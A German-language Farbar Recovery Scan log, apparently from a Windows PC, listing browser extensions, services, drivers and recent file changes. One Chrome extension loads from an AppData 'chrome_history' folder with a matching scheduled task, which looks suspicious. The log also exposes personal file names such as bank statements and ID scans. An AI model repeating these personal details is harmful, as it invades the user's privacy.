CHR Extension: (AdBlock — best ad blocker) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2022-05-18]
CHR Extension: (Excel Online) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\iljnkagajgfdmfnnidjijobijlfjfgnb [2020-12-10]
CHR Extension: (Cashback service LetyShops) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\lphicbbhfmllgmomkkhjfkpbdlncafbn [2022-06-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-12-10]
CHR Extension: (De-Fakeator) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pldoiobdcjagdiiphgfmbggpgmhkkaff [2020-12-10]
CHR Extension: (Configure) - C:\Users\chris\AppData\Local\chrome_history [2022-06-19]
CHR HKLM\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]

Opera: 
=======
OPR Profile: C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable [2022-07-19]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding}
OPR Extension: (Avira Safe Shopping) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\dalelnnofafalcmkmnhdbigbjjkloabo [2021-01-05]
OPR Extension: (Rich Hints Agent) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-01-05]
OPR Extension: (Avira Password Manager) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\ngohaaocccbohaffogpbgfpmpgbcgccg [2021-01-05]
OPR Extension: (Free Avira Phantom VPN – Entsperrt Webseiten) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\pcgkmkjdikhiodinhloioejnpjgmfigd [2021-01-05]
StartMenuInternet: (HKU\S-1-5-21-292222086-413629167-3624375346-1001) Opera GXStable - "C:\Users\chris\AppData\Local\Programs\Opera GX\Launcher.exe"
StartMenuInternet: (HKU\S-1-5-21-292222086-413629167-3624375346-1006) Opera GXStable - "C:\Users\Lisa\AppData\Local\Programs\Opera GX\Launcher.exe"

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AsusUpdateCheck; C:\Windows\System32\AsusUpdateCheck.exe [768408 2022-07-19] (ASUSTeK Computer Inc. -> )
R2 AviraOptimizerHost; C:\Program Files (x86)\Avira\Optimizer Host\Avira.OptimizerHost.exe [3000608 2022-03-25] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 AviraPhantomVPN; C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe [386864 2022-03-30] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 AviraSecurity; C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.exe [264400 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
S2 AviraSecurityUpdater; C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Common.Updater.exe [282464 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
R2 EndpointProtectionService; C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe [8481656 2022-07-14] (Avira Operations GmbH -> Avira Operations GmbH)
S3 EndpointProtectionService2; C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe [8481656 2022-07-14] (Avira Operations GmbH -> Avira Operations GmbH)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [342456 2020-12-08] (FUTUREMARK INC -> Futuremark)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [445432 2021-04-19] (Canon Inc. -> )
R2 nordvpn-service; C:\Program Files\NordVPN\nordvpn-service.exe [280440 2021-06-05] (nordvpn s.a. -> TEFINCOM S.A.)
S3 OVRLibraryService; C:\Program Files\Oculus\Support\oculus-librarian\OVRLibraryService.exe [148064 2022-07-14] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 OVRService; C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe [514656 2022-07-14] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2022-03-17] (Even Balance, Inc. -> )
R2 Razer Chroma SDK Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe [2028568 2022-02-21] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [461336 2021-11-30] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma Stream Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe [1349688 2022-02-21] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Game Manager Service; C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe [254224 2021-11-16] (Razer USA Ltd. -> Razer Inc)
R2 Razer Synapse Service; D:\Synapse3\Service\Razer Synapse Service.exe [298056 2022-02-28] (Razer USA Ltd. -> Razer Inc.)
R2 RzActionSvc; C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe [533824 2022-02-18] (Razer USA Ltd. -> Razer Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 BdSentry; C:\Windows\System32\DRIVERS\BdSentry.sys [230520 2022-06-21] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R2 NDivert; C:\Program Files\NordVPN\Drivers\NDivert.sys [128856 2021-06-09] (nordvpn s.a. -> Nordvpn S.A.)
R1 netprotection_network_filter; C:\Windows\System32\drivers\netprotection_network_filter.sys [100128 2022-06-15] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 netprotection_network_filter2; C:\Windows\System32\drivers\netprotection_network_filter2.sys [100376 2022-06-15] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 nlwt; C:\Windows\system32\DRIVERS\nlwt.sys [39360 2020-12-10] (TEFINCOM S.A. -> WireGuard LLC)
R1 nordlwf; C:\Windows\system32\DRIVERS\nordlwf.sys [38608 2020-10-14] (TEFINCOM S.A. -> TEFINCOM S.A.)
R3 oculusvad_oculusvad; C:\Windows\System32\drivers\oculusvad.sys [75280 2022-03-02] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R3 Oculus_ViGEmBus; C:\Windows\System32\drivers\Oculus_ViGEmBus.sys [32856 2022-03-02] (Oculus VR, LLC -> Facebook Inc.)
S0 rtp_elam; C:\Windows\System32\DRIVERS\rtp_elam.sys [24024 2022-06-30] (Microsoft Windows Early Launch Anti-Malware Publisher -> Avira Operations GmbH)
R2 rtp_filesystem_filter; C:\Windows\System32\DRIVERS\rtp_filesystem_filter.sys [202584 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R1 rtp_process_monitor; C:\Windows\system32\DRIVERS\rtp_process_monitor.sys [193304 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R1 rtp_traverse; C:\Windows\system32\DRIVERS\rtp_traverse.sys [47560 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R3 RzCommon; C:\Windows\System32\drivers\RzCommon.sys [54632 2021-03-30] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_0065; C:\Windows\System32\drivers\RzDev_0065.sys [54152 2020-08-24] (Razer USA Ltd. -> Razer Inc)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [167280 2020-11-11] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\System32\drivers\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapnordvpn; C:\Windows\System32\drivers\tapnordvpn.sys [44896 2020-06-09] (TEFINCOM S.A. -> The OpenVPN Project)
R1 ViGEmBus; C:\Windows\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.)
R3 vmulti; C:\Windows\System32\drivers\vmulti.sys [19600 2020-12-13] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49576 2022-07-14] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [452856 2022-07-14] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [91384 2022-07-14] (Microsoft Windows -> Microsoft Corporation)
S3 wintun; C:\Windows\system32\DRIVERS\wintun.sys [29680 2021-10-07] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2022-07-19 12:28 - 2022-07-19 12:29 - 000035282 _____ C:\Users\chris\Downloads\FRST.txt
2022-07-19 12:28 - 2022-07-19 12:28 - 000000000 ____D C:\FRST
2022-07-19 12:25 - 2022-07-19 12:25 - 002369536 _____ (Farbar) C:\Users\chris\Downloads\FRST64.exe
2022-07-17 21:40 - 2022-07-17 21:40 - 2467378443 _____ C:\Windows\MEMORY.DMP
2022-07-17 21:40 - 2022-07-17 21:40 - 005480100 _____ C:\Windows\Minidump\071722-8656-01.dmp
2022-07-14 23:16 - 2022-07-14 23:24 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job
2022-07-14 23:15 - 2022-07-14 23:15 - 000000000 ____D C:\Windows\pss
2022-07-14 19:43 - 2022-06-15 09:28 - 000100376 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\netprotection_network_filter2.sys
2022-07-14 18:27 - 2022-07-14 18:27 - 000003888 _____ C:\Windows\system32\Tasks\Avira_Security_Maintenance
2022-07-14 18:27 - 2022-07-14 18:27 - 000003428 _____ C:\Windows\system32\Tasks\Avira_Security_Service_SCM_Watchdog
2022-07-14 17:50 - 2022-07-14 17:50 - 000693248 _____ C:\Windows\system32\FsNVSDeviceSource.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000530944 _____ (curl, hxxps://curl.se/) C:\Windows\system32\curl.exe
2022-07-14 17:50 - 2022-07-14 17:50 - 000470528 _____ (curl, hxxps://curl.se/) C:\Windows\SysWOW64\curl.exe
2022-07-14 17:50 - 2022-07-14 17:50 - 000270848 _____ C:\Windows\system32\EsclScan.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000152064 _____ C:\Windows\system32\EsclProtocol.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\mode.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000026624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mode.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\tree.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000018944 _____ C:\Windows\SysWOW64\WsdProviderUtil.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tree.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\chcp.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chcp.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000011811 _____ C:\Windows\system32\DrtmAuthTxt.wim
2022-07-14 17:49 - 2022-07-14 17:49 - 002260480 _____ C:\Windows\system32\TextInputMethodFormatter.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000640512 _____ C:\Windows\system32\SettingSyncDownloadHelper.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000288768 _____ C:\Windows\system32\Windows.Management.InprocObjects.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000061952 _____ C:\Windows\system32\printticketvalidation.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000057344 _____ C:\Windows\system32\APMonUI.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000024576 _____ C:\Windows\system32\WsdProviderUtil.dll
2022-07-14 17:44 - 2022-07-14 17:44 - 000000000 ___HD C:\$WinREAgent
2022-07-13 14:31 - 2022-07-13 14:31 - 000328985 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-13 at 14.26.58 (1).jpeg
2022-07-13 14:31 - 2022-07-13 14:31 - 000171434 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-13 at 14.26.58.jpeg
2022-07-13 14:29 - 2022-07-13 14:29 - 000116599 _____ C:\Users\chris\Downloads\Probeklausur.pdf
2022-07-12 19:16 - 2022-07-12 19:16 - 000193337 _____ C:\Users\chris\Downloads\8104328_2022_Datenschutzrechtliche Einwilligung_vom_12.07.2022_20220712191654.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000076728 _____ C:\Users\chris\Downloads\8104328_2022_Nr.003_Kontoauszug_vom_31.03.2022_20220712191454.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000074601 _____ C:\Users\chris\Downloads\8104328_2022_Nr.001_Kontoauszug_vom_31.01.2022_20220712191449.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000073937 _____ C:\Users\chris\Downloads\8104328_2022_Nr.002_Kontoauszug_vom_28.02.2022_20220712191452.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000067892 _____ C:\Users\chris\Downloads\8104328_2022_Nr.004_Kontoauszug_vom_29.04.2022_20220712191457.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000080969 _____ C:\Users\chris\Downloads\8104328_2022_Nr.005_Kontoauszug_vom_31.05.2022_20220712191347.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000074623 _____ C:\Users\chris\Downloads\8104328_2022_Nr.006_Kontoauszug_vom_30.06.2022_20220712191345.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000060149 _____ C:\Users\chris\Downloads\8104328_2022_Ihr Rechnungsabschluss_vom_30.06.2022_20220712191341.pdf
2022-07-12 16:32 - 2022-07-12 16:33 - 002107659 _____ C:\Users\chris\Documents\IMG_20220712_0001.pdf
2022-07-12 16:26 - 2022-07-12 16:26 - 000282547 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-11 at 21.46.27.jpeg
2022-07-12 11:18 - 2022-07-12 11:18 - 000259752 _____ C:\Users\chris\Downloads\aufgaben_kap5.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000258142 _____ C:\Users\chris\Downloads\aufgaben_kap2.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000230124 _____ C:\Users\chris\Downloads\aufgaben_kap3.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000223671 _____ C:\Users\chris\Downloads\aufgaben_kap1.pdf
2022-07-12 11:17 - 2022-07-12 11:17 - 000227308 _____ C:\Users\chris\Downloads\aufgaben_kap4.pdf
2022-07-11 19:12 - 2022-07-11 19:12 - 000299459 _____ C:\Users\chris\Downloads\Dritter_Hauptsatz.pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000087127 _____ C:\Users\chris\Downloads\Studienverlaufsbescheinigung [PDF] (3).pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000073060 _____ C:\Users\chris\Downloads\BAföG Bescheinigung [PDF] (3).pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000072760 _____ C:\Users\chris\Downloads\Immatrikulationsbescheinigung [PDF] (9).pdf
2022-07-10 17:01 - 2022-07-10 17:02 - 000319960 _____ C:\Users\chris\Documents\Perso_2.pdf
2022-07-07 19:16 - 2022-07-07 19:16 - 000251922 _____ C:\Users\chris\Downloads\Vorstellungsvortrage_W3-Physik_bioinspirierter_diskreter_Systeme147.pdf
2022-07-06 21:22 - 2022-07-06 21:22 - 000251922 _____ C:\Users\chris\Downloads\Vorstellungsvorträge W3-Physik bioinspirierter diskreter Systeme[147].pdf
2022-07-05 15:43 - 2022-07-05 15:44 - 000105989 _____ C:\Users\chris\Downloads\Super-PIN.pdf
2022-07-05 15:42 - 2022-07-05 15:42 - 000000754 _____ C:\Users\chris\Desktop\Dokumente - Verknüpfung.lnk
2022-07-05 14:48 - 2022-07-05 14:51 - 002613332 _____ C:\Users\chris\Documents\IMG_20220705_0001.pdf
2022-07-04 15:32 - 2022-07-04 15:35 - 002807761 _____ C:\Users\chris\Documents\IMG_20220704_0002.pdf
2022-07-04 15:18 - 2022-07-04 15:24 - 002778650 _____ C:\Users\chris\Documents\IMG_20220704_0001.pdf
2022-07-03 19:55 - 2022-07-03 19:55 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Fek
2022-07-03 19:54 - 2020-08-18 04:51 - 000000000 ____D C:\Users\chris\Documents\WIN64
2022-07-03 18:32 - 2022-07-03 18:32 - 000176776 _____ C:\Users\chris\Downloads\Thermodynamik (1).pdf
2022-07-03 18:30 - 2022-07-03 18:30 - 000176789 _____ C:\Users\chris\Downloads\Thermodynamik.pdf
2022-07-03 17:37 - 2022-07-03 17:37 - 000078801 _____ C:\Users\chris\Downloads\_Rechnung Juni 2022 - Sebastian (1).pdf
2022-07-01 21:42 - 2022-07-01 21:42 - 000000000 ____D C:\Windows\SysWOW64\ncp
2022-07-01 21:42 - 2022-06-15 09:28 - 000100128 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\netprotection_network_filter.sys
2022-07-01 21:41 - 2022-07-14 23:18 - 000001236 _____ C:\Users\Public\Desktop\Avira.lnk
2022-07-01 21:41 - 2022-07-14 18:27 - 000003478 _____ C:\Windows\system32\Tasks\Avira_Security_Update
2022-07-01 21:41 - 2022-07-01 21:41 - 005601064 _____ (Avira Operations GmbH & Co. KG) C:\Users\chris\Downloads\avira_en_sptl1_1567964500-1646663480__phpws-spotlighttrialflow3-control.exe
2022-07-01 21:41 - 2022-07-01 21:41 - 000003778 _____ C:\Windows\system32\Tasks\AviraSystemSpeedupVerify
2022-07-01 21:41 - 2022-07-01 21:41 - 000002818 _____ C:\Windows\system32\Tasks\Avira_Security_Systray
2022-07-01 21:41 - 2022-07-01 21:41 - 000000000 ____D C:\Users\Public\Speedup Sessions
2022-07-01 21:41 - 2022-07-01 21:41 - 000000000 ____D C:\Program Files\Avira
2022-07-01 21:41 - 2022-06-30 11:17 - 000202584 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_filesystem_filter.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000193304 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_process_monitor.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000047560 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_traverse.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000024024 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_elam.sys
2022-07-01 21:41 - 2022-06-21 17:57 - 000230520 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\BdSentry.sys
2022-06-30 19:24 - 2022-06-30 19:24 - 000118047 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-06-30 at 14.00.54 (1).jpeg
2022-06-30 19:03 - 2022-06-30 19:03 - 000118047 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-06-30 at 14.00.54.jpeg
2022-06-30 18:12 - 2022-06-30 18:12 - 000146362 _____ C:\Users\chris\Downloads\u11 (5).pdf
2022-06-29 20:09 - 2022-06-29 20:09 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Yabukaradoo
2022-06-29 19:51 - 2022-06-29 19:51 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Laplace
2022-06-29 18:16 - 2022-06-29 18:16 - 000078535 _____ C:\Users\chris\Downloads\_Rechnung Juni 2022 - Sebastian.pdf
2022-06-29 12:28 - 2022-06-29 12:28 - 000146362 _____ C:\Users\chris\Downloads\u11 (4).pdf
2022-06-27 14:45 - 2022-06-27 14:47 - 002934336 _____ C:\Users\chris\Documents\IMG_20220627_0001.pdf
2022-06-26 16:46 - 2022-06-26 16:46 - 000000223 _____ C:\Users\chris\Desktop\Democracy 4.url
2022-06-26 12:40 - 2022-06-26 12:40 - 000146362 _____ C:\Users\chris\Downloads\u11 (3).pdf
2022-06-26 12:12 - 2022-06-26 12:12 - 000100026 _____ C:\Users\chris\Downloads\u10 (2).pdf
2022-06-22 21:49 - 2022-06-22 21:49 - 000100026 _____ C:\Users\chris\Downloads\u10 (1).pdf
2022-06-22 21:47 - 2022-06-22 21:47 - 000146362 _____ C:\Users\chris\Downloads\u11 (2).pdf
2022-06-22 19:14 - 2022-06-22 19:14 - 021972442 _____ C:\Users\chris\Downloads\7_Magnetische_Eigenschaften_von_Ferromagnetika (3).pdf
2022-06-21 11:38 - 2022-06-21 11:38 - 000620671 _____ C:\Users\chris\Downloads\fernabsatz_1741976447.pdf
2022-06-21 11:38 - 2022-06-21 11:38 - 000620671 _____ C:\Users\chris\Downloads\1741976447_c32aedbc-9e90-466b-ba75-004873f96082.pdf
2022-06-20 20:11 - 2022-07-14 23:24 - 001585632 _____ C:\Windows\system32\rtp.db
2022-06-20 20:06 - 2022-06-20 20:08 - 001302032 _____ C:\Users\chris\Documents\IMG_20220620_0001.pdf
2022-06-19 17:32 - 2022-06-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Local\chrome_history
2022-06-19 14:34 - 2022-06-19 14:34 - 000013834 _____ C:\Windows\system32\Tasks\chrome history

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2022-07-19 12:25 - 2020-12-10 18:58 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-19 12:18 - 2020-12-10 20:14 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-19 12:17 - 2020-12-10 18:51 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-19 12:14 - 2022-04-19 20:35 - 000000000 ____D C:\Users\chris\AppData\Local\blow_the_leaves_away
2022-07-19 12:10 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\AppReadiness
2022-07-19 12:10 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-19 12:09 - 2020-12-11 01:24 - 001834566 _____ C:\Windows\system32\PerfStringBackup.INI
2022-07-19 12:09 - 2019-12-07 16:50 - 000785790 _____ C:\Windows\system32\perfh007.dat
2022-07-19 12:09 - 2019-12-07 16:50 - 000167904 _____ C:\Windows\system32\perfc007.dat
2022-07-19 12:09 - 2019-12-07 11:13 - 000000000 ____D C:\Windows\INF
2022-07-19 12:03 - 2022-03-02 16:07 - 000000000 ____D C:\Users\chris\AppData\Local\Oculus
2022-07-19 12:03 - 2020-12-10 18:34 - 000000000 ___RD C:\Users\chris\OneDrive
2022-07-19 12:02 - 2020-12-11 01:18 - 000807280 _____ C:\Windows\system32\wpbbin.exe
2022-07-19 12:02 - 2020-12-11 01:18 - 000768408 _____ C:\Windows\system32\AsusUpdateCheck.exe
2022-07-19 12:02 - 2020-12-11 01:18 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-19 12:02 - 2020-12-10 18:31 - 000000000 ____D C:\Users\chris
2022-07-19 12:02 - 2020-11-19 01:34 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-07-19 12:02 - 2020-11-19 00:34 - 000000000 ____D C:\Windows\system32\SleepStudy
2022-07-19 00:06 - 2021-02-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Roaming\discord
2022-07-18 23:51 - 2021-02-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Local\Discord
2022-07-18 12:19 - 2021-01-05 14:23 - 000004232 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1609849433
2022-07-18 12:19 - 2021-01-05 14:23 - 000001389 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera-Browser.lnk
2022-07-18 12:14 - 2022-03-02 17:29 - 000000000 ____D C:\ProgramData\Oculus
2022-07-17 21:49 - 2019-12-07 11:03 - 000000000 ____D C:\Windows\CbsTemp
2022-07-17 21:40 - 2022-05-08 20:33 - 000000000 ____D C:\Windows\Minidump
2022-07-17 17:46 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-17 17:43 - 2020-11-19 01:37 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-17 17:43 - 2020-11-19 01:37 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-15 12:03 - 2022-03-17 15:03 - 000000000 ____D C:\Users\chris\Downloads\DS4Windows
2022-07-15 11:22 - 2022-03-17 15:14 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2022-07-15 11:22 - 2022-03-17 15:13 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2022-07-15 11:21 - 2022-03-17 15:06 - 000000000 ____D C:\Users\chris\AppData\Roaming\DS4Windows
2022-07-15 11:21 - 2021-09-09 14:12 - 000000000 ____D C:\Users\chris\AppData\Local\Ubisoft Game Launcher
2022-07-15 11:16 - 2021-01-12 20:22 - 000004240 _____ C:\Windows\system32\Tasks\Opera GX scheduled Autoupdate 1610475719
2022-07-15 11:16 - 2021-01-12 20:21 - 000001434 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Browser Opera GX.lnk
2022-07-15 01:48 - 2021-10-07 19:06 - 000001345 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk
2022-07-15 01:48 - 2021-10-07 19:06 - 000000000 ___RD C:\Users\chris\AppData\Local\PCHealthCheck
2022-07-15 01:47 - 2019-12-07 11:03 - 000786432 _____ C:\Windows\system32\config\BBI
2022-07-14 20:50 - 2020-11-19 00:34 - 000258000 _____ C:\Windows\system32\FNTCACHE.DAT
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\PrintDialog
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\SysWOW64\WinMetadata
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\SystemResources
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\WinMetadata
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\setup
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\oobe
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\es-MX
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\DDFs
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\ShellExperiences
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\ShellComponents
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\bcastdvr
2022-07-14 19:18 - 2022-03-17 15:13 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
